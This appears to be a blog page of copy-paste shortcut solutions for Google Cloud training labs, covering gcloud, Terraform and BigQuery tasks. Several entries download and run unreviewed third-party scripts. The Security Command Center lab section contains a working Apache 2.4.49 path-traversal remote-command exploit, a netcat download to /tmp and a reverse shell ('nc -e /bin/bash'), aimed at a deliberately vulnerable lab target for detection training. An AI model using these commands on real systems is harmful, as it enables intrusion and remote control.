google-site-verification=EmVnnySXehAfTr_j8ZJN48hwvxJtfNf80pkPX1ObQlA Fast Track News: March 2024

March || Level 3 || Lab 8 Arcade Hero: Enter the Source Repository

Command ► gcloud source repos create REPO_NAME 

March || Level 3 || Lab 7 Arcade Hero: Enter the Firewall Target Tag

 gcloud compute --project=$DEVSHELL_PROJECT_ID firewall-rules create default-allow-inbound --direction=INGRESS --priority=1000 --network=default --action=ALLOW --rules=tcp:80 --source-ranges=0.0.0.0/0 --target-tags=staging-vm

March || Level 3 || Lab 6 Arcade Hero: Enter the Outbound Firewall

 gcloud compute --project=$DEVSHELL_PROJECT_ID firewall-rules create default-allow-outbound --direction=EGRESS --priority=1000 --network=default --action=ALLOW --rules=tcp:80 --source-ranges=0.0.0.0/0 --target-tags=staging-vm

March || Level 3 || Lab 5 Arcade Hero: Enter the Inbound Firewall

 gcloud compute --project=$DEVSHELL_PROJECT_ID firewall-rules create default-allow-inbound --direction=INGRESS --priority=1000 --network=default --action=ALLOW --rules=tcp:80 --source-ranges=0.0.0.0/0 --target-tags=staging-vm

March || Level 3 || Lab 4 Arcade Hero: Enter the PubSub Subscription

 curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Arcade%20Hero/quicklabarc124.sh


sudo chmod +x quicklabarc124.sh


./quicklabarc124.sh

March || Level 3 || Lab 3 Arcade Hero: Enter the BigQuery Table

 curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Arcade%20Hero/quicklabarc130.sh


sudo chmod +x quicklabarc130.sh


./quicklabarc130.sh

March || Level 3 || Lab 2 Arcade Hero: Enter the Subnet

export REGION=


curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Arcade%20Hero/quicklabarc127.sh


sudo chmod +x quicklabarc127.sh


./quicklabarc127.sh 

March || Level 3 || Lab 1 Arcade Hero: Enter the BigQuery

 bq --location=US mk --dataset $DEVSHELL_PROJECT_ID:DATASET_NAME

March || Level 2 || Lab 12 Configuring IAM Permissions with gcloud

 export SECOND_USER_NAME=


export SECOND_PROJECT_ID=



curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Configuring%20IAM%20Permissions%20with%20gcloud%20updated/quicklabgsp647.sh



sudo chmod +x quicklabgsp647.sh


./quicklabgsp647.sh

March || Level 2 || Lab 11 Create a Cosmetic Anomaly Detection Model using Visual Inspection AI

gcloud auth list

gcloud config list project


export PROJECT_ID=$(gcloud config get-value core/project)

gsutil mb gs://${PROJECT_ID}

gsutil -m cp gs://cloud-training/gsp897/cosmetic-test-data/*.png \

gs://${PROJECT_ID}/cosmetic-test-data/


gsutil ls gs://${PROJECT_ID}/cosmetic-test-data/*.png > /tmp/demo_cosmetic_images.csv

gsutil cp /tmp/demo_cosmetic_images.csv gs://${PROJECT_ID}/demo_cosmetic_images.csv


March || Level 2 || Lab 10 Video Intelligence: Qwik Start

 curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Video%20Intelligence%20Qwik%20Start/quicklabgsp154.sh


sudo chmod +x quicklabgsp154.sh


./quicklabgsp154.sh

March || Level 2 || Lab 9 Interact with Terraform Modules

 export PROJECT_ID=$(gcloud config get-value project)

git clone https://github.com/terraform-google-modules/terraform-google-network

cd terraform-google-network

git checkout tags/v6.0.1 -b v6.0.1

echo 'module "test-vpc-module" {

  source       = "terraform-google-modules/network/google"

  version      = "~> 6.0"

  project_id   = var.project_id

  network_name = var.network_name

  mtu          = 1460


  subnets = [

    {

      subnet_name   = "subnet-01"

      subnet_ip     = "10.10.10.0/24"

      subnet_region = "us-west1"

    },

    {

      subnet_name           = "subnet-02"

      subnet_ip             = "10.10.20.0/24"

      subnet_region         = "us-west1"

      subnet_private_access = "true"

      subnet_flow_logs      = "true"

    },

    {

      subnet_name               = "subnet-03"

      subnet_ip                 = "10.10.30.0/24"

      subnet_region             = "us-west1"

      subnet_flow_logs          = "true"

      subnet_flow_logs_interval = "INTERVAL_10_MIN"

      subnet_flow_logs_sampling = 0.7

      subnet_flow_logs_metadata = "INCLUDE_ALL_METADATA"

      subnet_flow_logs_filter   = "false"

    }

  ]

}' > examples/simple_project/main.tf


echo 'variable "project_id" {

  description = "The project ID to host the network in Cloudhustler"

  default     = "'"$PROJECT_ID"'"

}

variable "network_name" {

  description = "The name of the VPC network being created Hustler"

  default     = "cloudhustlers"

}' > examples/simple_project/variables.tf

cd ~/terraform-google-network/examples/simple_project

terraform init

terraform apply -auto-approve

terraform destroy -auto-approve

rm -rd terraform-google-network -f

cd ~

gsutil mb gs://$PROJECT_ID

curl https://raw.githubusercontent.com/hashicorp/learn-terraform-modules/master/modules/aws-s3-static-website-bucket/www/index.html > index.html

curl https://raw.githubusercontent.com/hashicorp/learn-terraform-modules/blob/master/modules/aws-s3-static-website-bucket/www/error.html > error.html

gsutil cp *.html gs://$PROJECT_ID

March || Level 2 || Lab 8 Infrastructure as Code with Terraform

 export PROJECT_ID=$(gcloud config get-value project)

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}' > main.tf

terraform init

terraform apply -auto-approve

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  boot_disk {

    initialize_params {

      image = "debian-cloud/debian-11"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}' > main.tf

terraform apply -auto-approve

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

  boot_disk {

    initialize_params {

      image = "debian-cloud/debian-11"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}' > main.tf

terraform apply -auto-approve

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}' > main.tf

terraform apply -auto-approve

terraform destroy -auto-approve

terraform apply -auto-approve

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}

resource "google_compute_address" "vm_static_ip" {

  name = "terraform-static-ip"

}' > main.tf

terraform plan

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

    network_interface {

    network = google_compute_network.vpc_network.self_link

    access_config {

      nat_ip = google_compute_address.vm_static_ip.address

    }

  }

}

resource "google_compute_address" "vm_static_ip" {

  name = "terraform-static-ip"

}' > main.tf

terraform plan -out static_ip

terraform apply "static_ip"

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

    network_interface {

    network = google_compute_network.vpc_network.self_link

    access_config {

      nat_ip = google_compute_address.vm_static_ip.address

    }

  }

}

resource "google_compute_address" "vm_static_ip" {

  name = "terraform-static-ip"

}

# New resource for the storage bucket our application will use.

resource "google_storage_bucket" "example_bucket" {

  name     = "'"$PROJECT_ID"'"

  location = "US"

  website {

    main_page_suffix = "index.html"

    not_found_page   = "404.html"

  }

}

# Create a new instance that uses the bucket

resource "google_compute_instance" "another_instance" {

  depends_on = [google_storage_bucket.example_bucket]

  name         = "terraform-instance-2"

  machine_type = "e2-micro"

  boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.self_link

    access_config {

    }

  }

}' > main.tf

terraform plan

terraform apply -auto-approve

March || Level 2 || Lab 7 Terraform Fundamentals

 export ZONE=


curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Terraform%20Fundamentals/quicklabgsp156.sh


sudo chmod +x quicklabgsp156.sh


./quicklabgsp156.sh

March || Level 2 || Lab 6 Exploring NCAA Data with BigQuery

 Query 1


#standardSQL

SELECT

  event_type,

  COUNT(*) AS event_count

FROM `bigquery-public-data.ncaa_basketball.mbb_pbp_sr`

GROUP BY 1

ORDER BY event_count DESC;


 Query 2


#standardSQL

#most three points made

SELECT

  scheduled_date,

  name,

  market,

  alias,

  three_points_att,

  three_points_made,

  three_points_pct,

  opp_name,

  opp_market,

  opp_alias,

  opp_three_points_att,

  opp_three_points_made,

  opp_three_points_pct,

  (three_points_made + opp_three_points_made) AS total_threes

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

WHERE season > 2010

ORDER BY total_threes DESC

LIMIT 5;


 Query 3


#standardSQL

SELECT

  venue_name, venue_capacity, venue_city, venue_state

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

GROUP BY 1,2,3,4

ORDER BY venue_capacity DESC

LIMIT 5;


 Query 4


#standardSQL

#highest scoring game of all time

SELECT

  scheduled_date,

  name,

  market,

  alias,

  points_game AS team_points,

  opp_name,

  opp_market,

  opp_alias,

  opp_points_game AS opposing_team_points,

  points_game + opp_points_game AS point_total

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

WHERE season > 2010

ORDER BY point_total DESC

LIMIT 5;


 Query 5

#standardSQL

#biggest point difference in a championship game

SELECT

  scheduled_date,

  name,

  market,

  alias,

  points_game AS team_points,

  opp_name,

  opp_market,

  opp_alias,

  opp_points_game AS opposing_team_points,

  ABS(points_game - opp_points_game) AS point_difference

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

WHERE season > 2015 AND tournament_type = 'National Championship'

ORDER BY point_difference DESC

LIMIT 5;



March || Level 2 || Lab 5 Managing Deployments Using Kubernetes Engine

 export ZONE=


curl -LO raw.githubusercontent.com/QUICK-GCP-LAB/2-Minutes-Labs-Solutions/main/Managing%20Deployments%20Using%20Kubernetes%20Engine/gsp053.sh


sudo chmod +x gsp053.sh


./gsp053.sh

March || Level 2 || Lab 4 Managing Terraform State

 export REGION=



curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Managing%20Terraform%20State/quicklabgsp752.sh



sudo chmod +x quicklabgsp752.sh


./quicklabgsp752.sh

March || Level 2 || Lab 3 Introduction to SQL for BigQuery and CloudSQL

 export REGION=


curl -LO raw.githubusercontent.com/Techcps/GSP-Short-Trick/master/Introduction%20to%20SQL%20for%20BigQuery%20and%20Cloud%20SQL/techcpsgsp281.sh

sudo chmod +x techcpsgsp281.sh

./techcpsgsp281.sh

March || Level 2 || Lab 2 Compute Engine: Qwik Start - Windows

 export ZONE=



curl -LO raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Compute%20Engine%20Qwik%20Start%20Windows/quicklabgsp093.sh


sudo chmod +x quicklabgsp093.sh


./quicklabgsp093.sh

March || Level 2 || Lab 1 Deploy, Scale, and Update Your Website on Google Kubernetes Engine

  export ZONE=


curl -LO raw.githubusercontent.com/Techcps/GSP-Short-Trick/master/Deploy%2C%20Scale%2C%20and%20Update%20Your%20Website%20on%20Google%20Kubernetes%20Engine/techcpsgsp663.sh

sudo chmod +x techcpsgsp663.sh

./techcpsgsp663.sh


March Skill Surge || Lab 8 || Consuming Customer Specific Datasets from Data Sharing Partners using BigQuery

 

GSP1043

Run in cloudshell

bq query \
--use_legacy_sql=false \
--destination_table=$DEVSHELL_PROJECT_ID:demo_dataset.authorized_table \
'SELECT * FROM (
SELECT *, ROW_NUMBER() OVER (PARTITION BY state_code ORDER BY area_land_meters DESC) AS cities_by_area
FROM `bigquery-public-data.geo_us_boundaries.zip_codes`) cities
WHERE cities_by_area <= 10 ORDER BY cities.state_code
LIMIT 1000;'

Bigquery > demo_dataset

Sharing > Authorize datasets > type and select demo_dataset > Add Authorization >close

authorized_table > Share

Add Principal > Paste username 1 and 2 from lab > Role BigQuery Data Viewer > save

Close the incognito window

Login to Publisher Console

For the project id copy it from task 1 step 6 (only projectid)

PROJECT_ID_1=
bq mk --use_legacy_sql=false --view 'SELECT *
FROM `'$PROJECT_ID_1'.demo_dataset.authorized_table`
WHERE state_code="NY"
LIMIT 1000' data_publisher_dataset.authorized_view
echo "PROJECT_ID_2=$DEVSHELL_PROJECT_ID"

Copy the project id 2 (From last line in terminal) and Store it

Bigquery > data_publisher_dataset

Sharing > Authorize Views > type and select data_publisher_dataset > Add Authorization >close

authorized_view > Share

Add Principal > Paste username 2 from lab > Role BigQuery Data Viewer > save

Close the incognito window

Login to Customer (Data Twin) Console

PROJECT_ID_2=
bq mk --use_legacy_sql=false --view 'SELECT cities.zip_code, cities.city, cities.state_code, customers.last_name, customers.first_name
FROM `'$DEVSHELL_PROJETC_ID'.customer_dataset.customer_info` as customers
JOIN `'$PROJECT_ID_2'.data_publisher_dataset.authorized_view` as cities
ON cities.state_code = customers.state;' customer_dataset.customer_table

March Skill Surge || Lab 7 || Detect and Investigate Threats with Security Command Center

 

GSP1125

Run in cloudshell

IAM & ADMIN > Audit Logs > Cloud Resource Manager API > Admin Read > Save

export ZONE=
REGION=${ZONE::-2}
gcloud projects add-iam-policy-binding $DEVSHELL_PROJECT_ID \
--member=user:demouser1@gmail.com --role=roles/bigquery.admin
gcloud projects remove-iam-policy-binding $DEVSHELL_PROJECT_ID \
--member=user:demouser1@gmail.com --role=roles/bigquery.admin
gcloud services enable securitycenter.googleapis.com --project=$DEVSHELL_PROJECT_ID
sleep 20
gcloud projects add-iam-policy-binding $DEVSHELL_PROJECT_ID \
  --member=user:$USER_EMAIL \
  --role=roles/cloudresourcemanager.projectIamAdmin 2>/dev/null
gcloud compute instances create instance-1 \
--zone=$ZONE \
--machine-type=e2-medium \
--network-interface=network-tier=PREMIUM,stack-type=IPV4_ONLY,subnet=default \
--metadata=enable-oslogin=true --maintenance-policy=MIGRATE --provisioning-model=STANDARD \
--scopes=https://www.googleapis.com/auth/cloud-platform --create-disk=auto-delete=yes,boot=yes,device-name=instance-1,image=projects/debian-cloud/global/images/debian-11-bullseye-v20230912,mode=rw,size=10,type=projects/$DEVSHELL_PROJECT_ID/zones/$ZONE/diskTypes/pd-balanced
gcloud dns --project=$DEVSHELL_PROJECT_ID policies create dns-test-policy --description="cloudhustler" --networks="default" --private-alternative-name-servers="" --no-enable-inbound-forwarding --enable-logging
sleep 30
gcloud compute ssh instance-1 --zone=$ZONE --tunnel-through-iap --project "$DEVSHELL_PROJECT_ID" --quiet --command "gcloud projects get-iam-policy \$(gcloud config get project) && curl etd-malware-trigger.goog"

Check till 2nd task then proceed

gcloud compute instances create attacker-instance \
--scopes=cloud-platform  \
--zone=$ZONE \
--machine-type=e2-medium  \
--image-family=ubuntu-2004-lts \
--image-project=ubuntu-os-cloud \
--no-address
gcloud compute instances delete instance-1 --zone=$ZONE --quiet
gcloud compute networks subnets update default \
--region=$REGION \
--enable-private-ip-google-access
sleep 30
gcloud compute ssh --zone "$ZONE" "attacker-instance" --quiet

image

IP is in TASK 5, STEP 5 (NOTE)

TASK_5_IP=
export ZONE=
sudo snap remove google-cloud-cli
curl -O https://dl.google.com/dl/cloudsdk/channels/rapid/downloads/google-cloud-cli-438.0.0-linux-x86_64.tar.gz
tar -xf google-cloud-cli-438.0.0-linux-x86_64.tar.gz
./google-cloud-sdk/install.sh

Press N > Press y

. ~/.bashrc
gcloud components install kubectl gke-gcloud-auth-plugin --quiet
gcloud container clusters create test-cluster \
--zone "$ZONE" \
--enable-private-nodes \
--enable-private-endpoint \
--enable-ip-alias \
--num-nodes=1 \
--master-ipv4-cidr "172.16.0.0/28" \
--enable-master-authorized-networks \
--master-authorized-networks "$TASK_5_IP"
sleep 30
while true; do
    output=$(kubectl describe daemonsets container-watcher -n kube-system)
    if [[ $output == *container-watcher-unique-id* ]]; then
        echo "Found unique ID in the output:"
        echo "$output"
        break
    else
        echo "SUBSCRIBE CLOUDHUSTLERS AND Comment on Video / Wait for sometime"
        sleep 10
    fi
done
kubectl create deployment apache-deployment \
--replicas=1 \
--image=us-central1-docker.pkg.dev/cloud-training-prod-bucket/scc-labs/ktd-test-httpd:2.4.49-vulnerable
kubectl expose deployment apache-deployment \
--name apache-test-service  \
--type NodePort \
--protocol TCP \
--port 80
NODE_IP=$(kubectl get nodes -o jsonpath={.items[0].status.addresses[0].address})
NODE_PORT=$(kubectl get service apache-test-service \
-o jsonpath={.spec.ports[0].nodePort})
gcloud compute firewall-rules create apache-test-service-fw \
--allow tcp:${NODE_PORT}
gcloud compute firewall-rules create apache-test-rvrs-cnnct-fw --allow tcp:8888
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; id"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; ls -l /"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; hostname"
gsutil cp \
gs://cloud-training/gsp1125/netcat-traditional_1.10-41.1_amd64.deb .
mkdir netcat-traditional
dpkg --extract netcat-traditional_1.10-41.1_amd64.deb netcat-traditional
LOCAL_IP=$(ip -4 addr show ens4 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo ${LOCAL_IP}
python3 -m http.server --bind ${LOCAL_IP} \
--directory ~/netcat-traditional/bin/ 8888 &

Press Enter

curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; id"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; ls -l /"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; hostname"
gsutil cp \
gs://cloud-training/gsp1125/netcat-traditional_1.10-41.1_amd64.deb .
mkdir netcat-traditional
dpkg --extract netcat-traditional_1.10-41.1_amd64.deb netcat-traditional
LOCAL_IP=$(ip -4 addr show ens4 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo ${LOCAL_IP}
python3 -m http.server --bind ${LOCAL_IP} \
--directory ~/netcat-traditional/bin/ 8888 &

Press Enter

curl http://${LOCAL_IP}:8888
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" --path-as-is --insecure --data "echo Content-Type: text/plain; echo; curl http://${LOCAL_IP}:8888/nc.traditional -o /tmp/nc"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; chmod +x /tmp/nc"
pkill python
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; /tmp/nc"

Open new terminal

export ZONE=us-central1-c
gcloud compute ssh --zone "$ZONE" "attacker-instance" --quiet --command "nc -nlvp 8888"

In first terminal

curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" --path-as-is --insecure --data "echo Content-Type: text/plain; echo; /tmp/nc ${LOCAL_IP} 8888 -e /bin/bash"

April Week 2 || Lab 2 || Troubleshooting Data Models in Looker

  CREATE NEW FILE NAME: user_order_lifetime view: user_order_lifetime { derived_table: { sql: SELECT order_items.user_id as us...